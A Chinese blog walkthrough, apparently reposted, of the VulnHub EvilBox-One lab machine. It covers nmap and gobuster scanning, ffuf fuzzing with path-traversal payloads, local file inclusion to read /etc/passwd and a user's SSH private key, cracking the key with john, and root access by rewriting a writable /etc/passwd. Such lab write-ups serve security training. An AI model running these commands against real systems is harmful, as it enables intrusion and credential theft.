VulnHub靶机-EvilBox | 红队打靶
2023-5-25 12:0:49 Author: 0x00实验室(查看原文) 阅读量:16 收藏

 声明:该篇文章仅供学习网络安全技术参考研究使用,请勿使用相关技术做违法操作。本公众号的技术文章可以转载,能被更多人认可本文的创作内容属实荣幸之至,请在转载时标明转载来源即可.也欢迎对文章中出现的不足和错误进行批评指正!

实战打靶系列第 06 篇文章 

靶机地址:

https://www.vulnhub.com/entry/evilbox-one,736/

信息收集

先做一个常规扫描

nmap -sP 10.0.2.0/24

image-20230521143250422

nmap -p- 10.0.0.6

image-20230521143440267

nmap -p22,80 -A 10.0.2.6

image-20230521143536407

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --url http://10.0.2.6

image-20230521144339689

打开主页,发现仅仅是阿帕奇的默认页面,而且也没利用的空间

换了个大字典,也就多了个robots文件

也没什么价值

因此我们尝试对secret目录进行爆破

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://10.0.2.6/secret/ -x php,txt

image-20230521150822440

到此信息收集完毕

Web渗透

参数爆破

对我们而言,收集到的信息并不多

除了对ssh爆破,只能对evil.php下手了

我们进行参数爆破

参数值我们可以自己写

1
2
3
a
b
c
'
"
,
;
?
/
|
\
%
{
[
../../../../../../../../../../etc/passwd

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -w /home/f.txt:ZHI -u http://10.0.2.6/secret/evil.php?FUZZ=ZHI -fs 0

image-20230521153752026

这样一下就豁然开朗了

文件包含利用

对于ctfer而言遇到这种漏洞肯定要试试php伪协议写入

image-20230521154936060

试了试

php://input php://filter/write

貌似都不行

看来只有读的权限

php://filter/read=convert.base64-encode/resource=../index.html

不过这样用处不大,因为我们可以直接读取

既然只能读文件那么我们就看看有没有敏感文件

ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -u http://10.0.2.6/secret/evil.php?command=../../../../../FUZZ -fs 0

image-20230521160608721

仔细看了下passwd文件发现了

image-20230521160738751

于是我们看看mowree的home文件夹有无敏感文件

ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -u http://10.0.2.6/secret/evil.php?command=../../../../../home/mowree/FUZZ -fs 0

image-20230521160945079

竟然有私钥,那必须登录试试

先下载下来

image-20230521161232129

john爆破

连接一下

image-20230521161413887

chmod 600 id_rsa

但是,id_rsa貌似被加密了,我们破解看看

image-20230521162015078

先格式成john能破解的文件

john rsa /usr/share/wordlists/rockyou.txt

image-20230521162120255

得到rsa使用密钥unicorn

image-20230521162653264

提权

name -a

image-20230521163324556

find / -perm -u=s -type f 2>/dev/null

image-20230521163020687

试了一会都没什么收获

直到看到

image-20230521163627376

这就好办了

我们直接修改/etc/pass的root的密码

那么我们先生成一个

image-20230521163757231

然后修改

image-20230521164505437

image-20230521164601916

拿到root

参考资料:https://www.aqniukt.com/goods/show/2434?targetId=16289&preview=0

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5MDY2MTUyMA==&mid=2247490066&idx=1&sn=f71610b4a4afb0f40e2923a320895fd1&chksm=cfd865edf8afecfb8763ae125c2bef7637574028fe1ee5b0820dda58137d3fef96dd44d45187#rd
如有侵权请联系:admin#unsafe.sh